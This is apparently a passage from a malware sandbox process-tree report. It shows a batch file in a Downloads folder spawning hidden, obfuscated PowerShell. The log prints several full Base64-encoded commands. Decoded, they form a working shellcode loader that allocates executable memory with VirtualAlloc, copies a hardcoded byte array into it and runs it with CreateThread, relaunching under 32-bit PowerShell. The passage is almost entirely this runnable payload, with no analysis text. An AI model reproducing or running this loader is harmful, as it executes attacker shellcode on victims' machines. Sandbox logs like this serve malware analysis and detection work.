A1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
2⤵
PID:7332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
PID:5192

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
PID:6636

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nohrhw2m\nohrhw2m.cmdline"
5⤵
PID:5768

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7D0.tmp" "c:\Users\Admin\AppData\Local\Temp\nohrhw2m\CSCAEB8D877549948CE8A66E990416C2D48.TMP"
6⤵
PID:6824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\hello.bat" "
1⤵
PID:2916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAA